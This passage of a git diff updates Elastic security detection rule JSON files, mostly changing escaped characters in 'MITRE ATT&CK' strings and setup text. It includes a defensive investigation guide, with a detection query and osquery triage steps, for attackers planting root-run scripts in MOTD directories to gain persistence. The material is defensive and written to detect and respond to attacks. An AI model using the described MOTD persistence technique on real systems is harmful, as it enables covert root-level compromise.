Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Delete the MOTD files or restore their original configuration.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Leverage the incident response data and logging to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n", + "note": "## Triage and analysis\n\n### Investigating Potential Persistence Through MOTD File Creation Detected\n\nThe message-of-the-day (MOTD) is used to display a customizable system-wide message or information to users upon login in Linux.\n\nAttackers can abuse message-of-the-day (motd) files to run scripts, commands or malicious software every time a user connects to a system over SSH or a serial connection, by creating a new file within the `/etc/update-motd.d/` or `/usr/lib/update-notifier/` directory. Executable files in these directories automatically run with root privileges.\n\nThis rule identifies the creation of new files within the `/etc/update-motd.d/` or `/usr/lib/update-notifier/` directories.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n> This investigation guide uses [placeholder fields](https://www.elastic.co/guide/en/security/current/osquery-placeholder-fields.html) to dynamically pass alert data into Osquery queries. Placeholder fields were introduced in Elastic Stack version 8.7.0. If you're using Elastic Stack version 8.6.0 or earlier, you'll need to manually adjust this investigation guide's queries to ensure they properly run.\n\n#### Possible Investigation Steps\n\n- Investigate the file that was created or modified.\n - !{osquery{\"label\":\"Osquery - Retrieve File Information\",\"query\":\"SELECT * FROM file WHERE path = {{file.path}}\"}}\n- Investigate whether any other files in the `/etc/update-motd.d/` or `/usr/lib/update-notifier/` directories have been altered.\n - !{osquery{\"label\":\"Osquery - Retrieve File Listing Information\",\"query\":\"SELECT * FROM file WHERE (path LIKE '/etc/update-motd.d/%' OR path LIKE '/usr/lib/update-notifier/%')\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Additional File Listing Information\",\"query\":\"SELECT\\n f.path,\\n u.username AS file_owner,\\n g.groupname AS group_owner,\\n datetime(f.atime, 'unixepoch') AS file_last_access_time,\\n datetime(f.mtime, 'unixepoch') AS file_last_modified_time,\\n datetime(f.ctime, 'unixepoch') AS file_last_status_change_time,\\n datetime(f.btime, 'unixepoch') AS file_created_time,\\n f.size AS size_bytes\\nFROM\\n file f\\n LEFT JOIN users u ON f.uid = u.uid\\n LEFT JOIN groups g ON f.gid = g.gid\\nWHERE (path LIKE '/etc/update-motd.d/%' OR path LIKE '/usr/lib/update-notifier/%')\\n\"}}\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence and whether they are located in expected locations.\n - !{osquery{\"label\":\"Osquery - Retrieve Running Processes by User\",\"query\":\"SELECT pid, username, name FROM processes p JOIN users u ON u.uid = p.uid ORDER BY username\"}}\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate whether the modified scripts call other malicious scripts elsewhere on the file system. \n - If scripts or executables were dropped, retrieve the files and determine if they are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n - File access, modification, and creation activities.\n - Cron jobs, services and other persistence mechanisms.\n - !{osquery{\"label\":\"Osquery - Retrieve Crontab Information\",\"query\":\"SELECT * FROM crontab\"}}\n\n### Related Rules\n\n- Suspicious Process Spawned from MOTD Detected - 4ec47004-b34a-42e6-8003-376a123ea447\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Any activity that triggered the alert and is not inherently malicious must be monitored by the security team.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Delete the MOTD files or restore their original configuration.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Leverage the incident response data and logging to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n", "query": "host.os.type :\"linux\" and event.action:(\"creation\" or \"file_create_event\" or \"rename\" or \"file_rename_event\") and \nfile.path : (/etc/update-motd.d/* or /usr/lib/update-notifier/*) and not process.name : (\n dpkg or dockerd or rpm or executor or dnf\n) and not file.extension : (\"swp\" or \"swpx\")\n", "references": [ "https://pberba.github.io/security/2022/02/06/linux-threat-hunting-for-persistence-initialization-scripts-and-shell-configuration/#10-boot-or-logon-initialization-scripts-motd" @@ -71,7 +71,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/96d11d31-9a79-480f-8401-da28b194608f_7.json b/packages/security_detection_engine/kibana/security_rule/96d11d31-9a79-480f-8401-da28b194608f_7.json index 2d7c9acb90d..7c75efa6a49 100644 --- a/packages/security_detection_engine/kibana/security_rule/96d11d31-9a79-480f-8401-da28b194608f_7.json +++ b/packages/security_detection_engine/kibana/security_rule/96d11d31-9a79-480f-8401-da28b194608f_7.json @@ -18,7 +18,7 @@ "file.path", "process.executable" ], - "note": "## Triage and analysis\n\n### Investigating Potential Persistence Through MOTD File Creation Detected\n\nThe message-of-the-day (MOTD) is used to display a customizable system-wide message or information to users upon login in Linux.\n\nAttackers can abuse message-of-the-day (motd) files to run scripts, commands or malicious software every time a user connects to a system over SSH or a serial connection, by creating a new file within the `/etc/update-motd.d/` or `/usr/lib/update-notifier/` directory. Executable files in these directories automatically run with root privileges.\n\nThis rule identifies the creation of new files within the `/etc/update-motd.d/` or `/usr/lib/update-notifier/` directories.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\u003e This investigation guide uses [placeholder fields](https://www.elastic.co/guide/en/security/current/osquery-placeholder-fields.html) to dynamically pass alert data into Osquery queries. Placeholder fields were introduced in Elastic Stack version 8.7.0. If you're using Elastic Stack version 8.6.0 or earlier, you'll need to manually adjust this investigation guide's queries to ensure they properly run.\n\n#### Possible Investigation Steps\n\n- Investigate the file that was created or modified.\n - !{osquery{\"label\":\"Osquery - Retrieve File Information\",\"query\":\"SELECT * FROM file WHERE path = {{file.path}}\"}}\n- Investigate whether any other files in the `/etc/update-motd.d/` or `/usr/lib/update-notifier/` directories have been altered.\n - !{osquery{\"label\":\"Osquery - Retrieve File Listing Information\",\"query\":\"SELECT * FROM file WHERE (path LIKE '/etc/update-motd.d/%' OR path LIKE '/usr/lib/update-notifier/%')\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Additional File Listing Information\",\"query\":\"SELECT\\n f.path,\\n u.username AS file_owner,\\n g.groupname AS group_owner,\\n datetime(f.atime, 'unixepoch') AS file_last_access_time,\\n datetime(f.mtime, 'unixepoch') AS file_last_modified_time,\\n datetime(f.ctime, 'unixepoch') AS file_last_status_change_time,\\n datetime(f.btime, 'unixepoch') AS file_created_time,\\n f.size AS size_bytes\\nFROM\\n file f\\n LEFT JOIN users u ON f.uid = u.uid\\n LEFT JOIN groups g ON f.gid = g.gid\\nWHERE (path LIKE '/etc/update-motd.d/%' OR path LIKE '/usr/lib/update-notifier/%')\\n\"}}\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence and whether they are located in expected locations.\n - !{osquery{\"label\":\"Osquery - Retrieve Running Processes by User\",\"query\":\"SELECT pid, username, name FROM processes p JOIN users u ON u.uid = p.uid ORDER BY username\"}}\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate whether the modified scripts call other malicious scripts elsewhere on the file system. \n - If scripts or executables were dropped, retrieve the files and determine if they are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n - File access, modification, and creation activities.\n - Cron jobs, services and other persistence mechanisms.\n - !{osquery{\"label\":\"Osquery - Retrieve Crontab Information\",\"query\":\"SELECT * FROM crontab\"}}\n\n### Related Rules\n\n- Suspicious Process Spawned from MOTD Detected - 4ec47004-b34a-42e6-8003-376a123ea447\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Any activity that triggered the alert and is not inherently malicious must be monitored by the security team.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Delete the MOTD files or restore their original configuration.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Leverage the incident response data and logging to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n", + "note": "## Triage and analysis\n\n### Investigating Potential Persistence Through MOTD File Creation Detected\n\nThe message-of-the-day (MOTD) is used to display a customizable system-wide message or information to users upon login in Linux.\n\nAttackers can abuse message-of-the-day (motd) files to run scripts, commands or malicious software every time a user connects to a system over SSH or a serial connection, by creating a new file within the `/etc/update-motd.d/` or `/usr/lib/update-notifier/` directory. Executable files in these directories automatically run with root privileges.\n\nThis rule identifies the creation of new files within the `/etc/update-motd.d/` or `/usr/lib/update-notifier/` directories.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n> This investigation guide uses [placeholder fields](https://www.elastic.co/guide/en/security/current/osquery-placeholder-fields.html) to dynamically pass alert data into Osquery queries. Placeholder fields were introduced in Elastic Stack version 8.7.0. If you're using Elastic Stack version 8.6.0 or earlier, you'll need to manually adjust this investigation guide's queries to ensure they properly run.\n\n#### Possible Investigation Steps\n\n- Investigate the file that was created or modified.\n - !{osquery{\"label\":\"Osquery - Retrieve File Information\",\"query\":\"SELECT * FROM file WHERE path = {{file.path}}\"}}\n- Investigate whether any other files in the `/etc/update-motd.d/` or `/usr/lib/update-notifier/` directories have been altered.\n - !{osquery{\"label\":\"Osquery - Retrieve File Listing Information\",\"query\":\"SELECT * FROM file WHERE (path LIKE '/etc/update-motd.d/%' OR path LIKE '/usr/lib/update-notifier/%')\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Additional File Listing Information\",\"query\":\"SELECT\\n f.path,\\n u.username AS file_owner,\\n g.groupname AS group_owner,\\n datetime(f.atime, 'unixepoch') AS file_last_access_time,\\n datetime(f.mtime, 'unixepoch') AS file_last_modified_time,\\n datetime(f.ctime, 'unixepoch') AS file_last_status_change_time,\\n datetime(f.btime, 'unixepoch') AS file_created_time,\\n f.size AS size_bytes\\nFROM\\n file f\\n LEFT JOIN users u ON f.uid = u.uid\\n LEFT JOIN groups g ON f.gid = g.gid\\nWHERE (path LIKE '/etc/update-motd.d/%' OR path LIKE '/usr/lib/update-notifier/%')\\n\"}}\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence and whether they are located in expected locations.\n - !{osquery{\"label\":\"Osquery - Retrieve Running Processes by User\",\"query\":\"SELECT pid, username, name FROM processes p JOIN users u ON u.uid = p.uid ORDER BY username\"}}\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate whether the modified scripts call other malicious scripts elsewhere on the file system. \n - If scripts or executables were dropped, retrieve the files and determine if they are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n - File access, modification, and creation activities.\n - Cron jobs, services and other persistence mechanisms.\n - !{osquery{\"label\":\"Osquery - Retrieve Crontab Information\",\"query\":\"SELECT * FROM crontab\"}}\n\n### Related Rules\n\n- Suspicious Process Spawned from MOTD Detected - 4ec47004-b34a-42e6-8003-376a123ea447\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Any activity that triggered the alert and is not inherently malicious must be monitored by the security team.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Delete the MOTD files or restore their original configuration.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Leverage the incident response data and logging to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n", "query": "host.os.type :\"linux\" and event.action:(\"creation\" or \"file_create_event\" or \"rename\" or \"file_rename_event\") and \nfile.path : (/etc/update-motd.d/* or /usr/lib/update-notifier/*) and not process.name : (\n dpkg or dockerd or rpm or executor or dnf\n) and not file.extension : (\"swp\" or \"swpx\")\n", "references": [ "https://pberba.github.io/security/2022/02/06/linux-threat-hunting-for-persistence-initialization-scripts-and-shell-configuration/#10-boot-or-logon-initialization-scripts-motd" @@ -71,7 +71,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/96e90768-c3b7-4df6-b5d9-6237f8bc36a8_102.json b/packages/security_detection_engine/kibana/security_rule/96e90768-c3b7-4df6-b5d9-6237f8bc36a8_102.json index d10ddf04e46..4f5c713e2f8 100644 --- a/packages/security_detection_engine/kibana/security_rule/96e90768-c3b7-4df6-b5d9-6237f8bc36a8_102.json +++ b/packages/security_detection_engine/kibana/security_rule/96e90768-c3b7-4df6-b5d9-6237f8bc36a8_102.json @@ -53,7 +53,7 @@ ], "risk_score": 73, "rule_id": "96e90768-c3b7-4df6-b5d9-6237f8bc36a8", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Elastic", @@ -64,7 +64,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/96e90768-c3b7-4df6-b5d9-6237f8bc36a8_103.json b/packages/security_detection_engine/kibana/security_rule/96e90768-c3b7-4df6-b5d9-6237f8bc36a8_103.json index 56ea6f1e419..22c12897b65 100644 --- a/packages/security_detection_engine/kibana/security_rule/96e90768-c3b7-4df6-b5d9-6237f8bc36a8_103.json +++ b/packages/security_detection_engine/kibana/security_rule/96e90768-c3b7-4df6-b5d9-6237f8bc36a8_103.json @@ -53,7 +53,7 @@ ], "risk_score": 73, "rule_id": "96e90768-c3b7-4df6-b5d9-6237f8bc36a8", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Domain: Endpoint", @@ -63,7 +63,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/96e90768-c3b7-4df6-b5d9-6237f8bc36a8_104.json b/packages/security_detection_engine/kibana/security_rule/96e90768-c3b7-4df6-b5d9-6237f8bc36a8_104.json index 26235897b50..f75efbee84c 100644 --- a/packages/security_detection_engine/kibana/security_rule/96e90768-c3b7-4df6-b5d9-6237f8bc36a8_104.json +++ b/packages/security_detection_engine/kibana/security_rule/96e90768-c3b7-4df6-b5d9-6237f8bc36a8_104.json @@ -53,7 +53,7 @@ ], "risk_score": 73, "rule_id": "96e90768-c3b7-4df6-b5d9-6237f8bc36a8", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Domain: Endpoint", @@ -64,7 +64,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/96e90768-c3b7-4df6-b5d9-6237f8bc36a8_105.json b/packages/security_detection_engine/kibana/security_rule/96e90768-c3b7-4df6-b5d9-6237f8bc36a8_105.json index d6bea1cb16d..6a5554d6241 100644 --- a/packages/security_detection_engine/kibana/security_rule/96e90768-c3b7-4df6-b5d9-6237f8bc36a8_105.json +++ b/packages/security_detection_engine/kibana/security_rule/96e90768-c3b7-4df6-b5d9-6237f8bc36a8_105.json @@ -52,7 +52,7 @@ ], "risk_score": 73, "rule_id": "96e90768-c3b7-4df6-b5d9-6237f8bc36a8", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "high", "tags": [ "Domain: Endpoint", @@ -63,7 +63,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/96e90768-c3b7-4df6-b5d9-6237f8bc36a8_106.json b/packages/security_detection_engine/kibana/security_rule/96e90768-c3b7-4df6-b5d9-6237f8bc36a8_106.json index 4c625d91f61..b4efba79368 100644 --- a/packages/security_detection_engine/kibana/security_rule/96e90768-c3b7-4df6-b5d9-6237f8bc36a8_106.json +++ b/packages/security_detection_engine/kibana/security_rule/96e90768-c3b7-4df6-b5d9-6237f8bc36a8_106.json @@ -62,7 +62,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/97020e61-e591-4191-8a3b-2861a2b887cd_3.json b/packages/security_detection_engine/kibana/security_rule/97020e61-e591-4191-8a3b-2861a2b887cd_3.json index 3de39af5d65..df6c49d63ea 100644 --- a/packages/security_detection_engine/kibana/security_rule/97020e61-e591-4191-8a3b-2861a2b887cd_3.json +++ b/packages/security_detection_engine/kibana/security_rule/97020e61-e591-4191-8a3b-2861a2b887cd_3.json @@ -58,7 +58,7 @@ ], "risk_score": 47, "rule_id": "97020e61-e591-4191-8a3b-2861a2b887cd", - "setup": "Windows Event 4703 logs Token Privileges changes and need to be configured (Enable).\n\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nPolicies \u003e\nWindows Settings \u003e\nSecurity Settings \u003e\nAdvanced Audit Policies Configuration \u003e\nAudit Policies \u003e\nDetailed Tracking \u003e\nToken Right Adjusted Events (Success)\n```", + "setup": "Windows Event 4703 logs Token Privileges changes and need to be configured (Enable).\n\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nDetailed Tracking >\nToken Right Adjusted Events (Success)\n```", "severity": "medium", "tags": [ "Elastic", @@ -69,7 +69,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/97020e61-e591-4191-8a3b-2861a2b887cd_4.json b/packages/security_detection_engine/kibana/security_rule/97020e61-e591-4191-8a3b-2861a2b887cd_4.json index a56814618a3..c5cf30f7b96 100644 --- a/packages/security_detection_engine/kibana/security_rule/97020e61-e591-4191-8a3b-2861a2b887cd_4.json +++ b/packages/security_detection_engine/kibana/security_rule/97020e61-e591-4191-8a3b-2861a2b887cd_4.json @@ -58,7 +58,7 @@ ], "risk_score": 47, "rule_id": "97020e61-e591-4191-8a3b-2861a2b887cd", - "setup": "Windows Event 4703 logs Token Privileges changes and need to be configured (Enable).\n\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nPolicies \u003e\nWindows Settings \u003e\nSecurity Settings \u003e\nAdvanced Audit Policies Configuration \u003e\nAudit Policies \u003e\nDetailed Tracking \u003e\nToken Right Adjusted Events (Success)\n```", + "setup": "Windows Event 4703 logs Token Privileges changes and need to be configured (Enable).\n\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nDetailed Tracking >\nToken Right Adjusted Events (Success)\n```", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -68,7 +68,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/97020e61-e591-4191-8a3b-2861a2b887cd_5.json b/packages/security_detection_engine/kibana/security_rule/97020e61-e591-4191-8a3b-2861a2b887cd_5.json index d729db4b55f..2579705f95e 100644 --- a/packages/security_detection_engine/kibana/security_rule/97020e61-e591-4191-8a3b-2861a2b887cd_5.json +++ b/packages/security_detection_engine/kibana/security_rule/97020e61-e591-4191-8a3b-2861a2b887cd_5.json @@ -57,7 +57,7 @@ ], "risk_score": 47, "rule_id": "97020e61-e591-4191-8a3b-2861a2b887cd", - "setup": "\nWindows Event 4703 logs Token Privileges changes and need to be configured (Enable).\n\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nPolicies \u003e\nWindows Settings \u003e\nSecurity Settings \u003e\nAdvanced Audit Policies Configuration \u003e\nAudit Policies \u003e\nDetailed Tracking \u003e\nToken Right Adjusted Events (Success)\n```\n", + "setup": "\nWindows Event 4703 logs Token Privileges changes and need to be configured (Enable).\n\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nDetailed Tracking >\nToken Right Adjusted Events (Success)\n```\n", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -67,7 +67,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/97314185-2568-4561-ae81-f3e480e5e695_101.json b/packages/security_detection_engine/kibana/security_rule/97314185-2568-4561-ae81-f3e480e5e695_101.json index 6eafbf335e0..f59373cf2c4 100644 --- a/packages/security_detection_engine/kibana/security_rule/97314185-2568-4561-ae81-f3e480e5e695_101.json +++ b/packages/security_detection_engine/kibana/security_rule/97314185-2568-4561-ae81-f3e480e5e695_101.json @@ -68,7 +68,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", diff --git a/packages/security_detection_engine/kibana/security_rule/97314185-2568-4561-ae81-f3e480e5e695_102.json b/packages/security_detection_engine/kibana/security_rule/97314185-2568-4561-ae81-f3e480e5e695_102.json index 38485abc440..8f3d0e60a6d 100644 --- a/packages/security_detection_engine/kibana/security_rule/97314185-2568-4561-ae81-f3e480e5e695_102.json +++ b/packages/security_detection_engine/kibana/security_rule/97314185-2568-4561-ae81-f3e480e5e695_102.json @@ -66,7 +66,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", diff --git a/packages/security_detection_engine/kibana/security_rule/97359fd8-757d-4b1d-9af1-ef29e4a8680e_103.json b/packages/security_detection_engine/kibana/security_rule/97359fd8-757d-4b1d-9af1-ef29e4a8680e_103.json index 754ee01b685..bf7b4ffd40e 100644 --- a/packages/security_detection_engine/kibana/security_rule/97359fd8-757d-4b1d-9af1-ef29e4a8680e_103.json +++ b/packages/security_detection_engine/kibana/security_rule/97359fd8-757d-4b1d-9af1-ef29e4a8680e_103.json @@ -59,7 +59,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/97359fd8-757d-4b1d-9af1-ef29e4a8680e_104.json b/packages/security_detection_engine/kibana/security_rule/97359fd8-757d-4b1d-9af1-ef29e4a8680e_104.json index 8f347c5d056..79ecf3cdc27 100644 --- a/packages/security_detection_engine/kibana/security_rule/97359fd8-757d-4b1d-9af1-ef29e4a8680e_104.json +++ b/packages/security_detection_engine/kibana/security_rule/97359fd8-757d-4b1d-9af1-ef29e4a8680e_104.json @@ -56,7 +56,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/979729e7-0c52-4c4c-b71e-88103304a79f_102.json b/packages/security_detection_engine/kibana/security_rule/979729e7-0c52-4c4c-b71e-88103304a79f_102.json index 4d2ca3264a1..d3b6bbd48b9 100644 --- a/packages/security_detection_engine/kibana/security_rule/979729e7-0c52-4c4c-b71e-88103304a79f_102.json +++ b/packages/security_detection_engine/kibana/security_rule/979729e7-0c52-4c4c-b71e-88103304a79f_102.json @@ -65,7 +65,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", @@ -87,7 +87,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", diff --git a/packages/security_detection_engine/kibana/security_rule/979729e7-0c52-4c4c-b71e-88103304a79f_103.json b/packages/security_detection_engine/kibana/security_rule/979729e7-0c52-4c4c-b71e-88103304a79f_103.json index 44c6d4e8ca0..a4bbc12a508 100644 --- a/packages/security_detection_engine/kibana/security_rule/979729e7-0c52-4c4c-b71e-88103304a79f_103.json +++ b/packages/security_detection_engine/kibana/security_rule/979729e7-0c52-4c4c-b71e-88103304a79f_103.json @@ -63,7 +63,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", @@ -85,7 +85,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", diff --git a/packages/security_detection_engine/kibana/security_rule/979729e7-0c52-4c4c-b71e-88103304a79f_104.json b/packages/security_detection_engine/kibana/security_rule/979729e7-0c52-4c4c-b71e-88103304a79f_104.json index c460ce01df4..979673bf7b2 100644 --- 